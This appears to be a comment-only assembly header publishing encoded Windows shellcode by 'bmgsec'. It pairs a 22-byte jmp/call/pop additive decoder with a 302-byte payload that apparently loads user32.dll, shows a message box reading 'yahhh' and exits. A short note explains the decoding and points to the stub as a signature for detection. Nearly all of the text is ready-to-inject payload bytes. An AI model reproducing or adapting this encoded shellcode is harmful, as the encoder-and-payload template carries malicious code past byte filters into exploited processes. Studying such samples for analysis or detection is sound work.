; dynamicmsg.asm
;
; Dynamic Message Box (302 bytes)
;
; //Additive decoder, 22 bytes [ bmgsec.com.au ]
; "\xeb\x0f\x5e\x31\xc9\x66\xb9\x2e\x01\x80\x06\x02\x46\xe2\xfa\xeb"
; "\x05\xe8\xec\xff\xff\xff"
;
; Note: the decoder is a jmp/call/pop stub. It takes the address of the bytes
; that follow it, loads cx with 0x012e (302, the payload length) and adds 2 to
; each of those bytes before jumping to them. The payload below is therefore
; listed in its encoded form, every byte 2 lower than the instruction stream
; that actually runs (the leading "\x2f\xbe" decodes to "\x31\xc0"). The ASCII
; runs near the end decode to "user32.dll", "bmgsec" and "yahhh", each followed
; by an 'N' placeholder byte. The stub itself is not encoded, so apart from the
; length word it is the fixed part to match on when looking for this payload.
;
; //Dynamic Message Box Shellcode, 302 bytes, exitMethod=ExitProcess [ bmgsec.com.au ]
; "\x2f\xbe\x2f\xd9\x2f\xc7\x2f\xd0\xe7\x9a\xfe\xfe\xfe\x54\x2f\xbe"
; "\x62\x89\x3e\x2e\x83\xbe\x76\x0a\x89\x3e\x0a\x89\x6e\x1a\xab\x89"
; "\x3e\x06\xe9\x07\x89\x3e\x32\x8b\x3e\x7a\x89\x3e\x3a\x5c\xc1\x5e"
; "\x89\x6a\x22\x22\x89\x43\x3a\x89\x52\x03\x76\xff\xe8\x89\x48\x16"
; "\x89\x58\x1e\xff\xe9\xe1\x32\x47\x89\x32\x89\xff\xec\x2f\xfd\x2f"
; "\xbe\xfa\xaa\x82\xbe\x72\x05\xbf\xcd\x0b\xff\xc5\xe9\xf2\x39\x7a"
; "\x22\x26\x73\xdf\x89\x58\x22\xff\xe9\x64\x89\x0a\x49\x89\x58\x1a"
; "\xff\xe9\x89\x02\x89\xff\xe6\x87\x42\x22\x1a\x5f\xc1\xab\x4e\x50"
; "\xe6\xa8\xfd\xfd\xfd\x87\x05\x7f\xc2\x06\xfe\xfe\xfe\x7f\xc5\x02"
; "\xfe\xfe\xfe\x37\xcc\x73\xe4\xc1\xe6\x1b\xfe\xfe\xfe\x8c\x4c\x0c"
; "\xea\x7c\xd6\xe0\x71\xa6\xa0\x4b\xba\x7f\xea\x06\xfe\xfe\xfe\x87"
; "\xe3\xe6\x55\xfd\xfd\xfd\x87\xc0\xe9\xdc\x5c\x8b\x7b\x02\x87\xef"
; "\x7f\xbf\x06\xfe\xfe\xfe\xe6\xb0\xfd\xfd\xfd\xe9\x37\x56\x2f\xd0"
; "\x86\x4e\x08\x7f\xbf\x02\xfe\xfe\xfe\x4f\x50\x4e\xfd\x53\x02\x58"
; "\x57\x87\xc0\xe6\x93\xfd\xfd\xfd\xe9\x2a\x59\x2f\xd0\x86\x51\x04"
; "\xe9\x2e\x57\x2f\xd0\x86\x4f\x03\x2f\xd0\x50\x51\x4f\x50\xfd\xce"
; "\x2f\xbe\x4e\xfd\x53\x06\xe6\xc0\xfd\xfd\xfd\x73\x71\x63\x70\x31"
; "\x30\x2c\x62\x6a\x6a\x4c\xe6\xcd\xfd\xfd\xfd\x60\x6b\x65\x71\x63"
; "\x61\x4c\xe6\xc9\xfd\xfd\xfd\x77\x5f\x66\x66\x66\x4c\xfd";
;
; Written by bmgsec (bmgsec [at] gmail.com / www.bmgsec.com.au)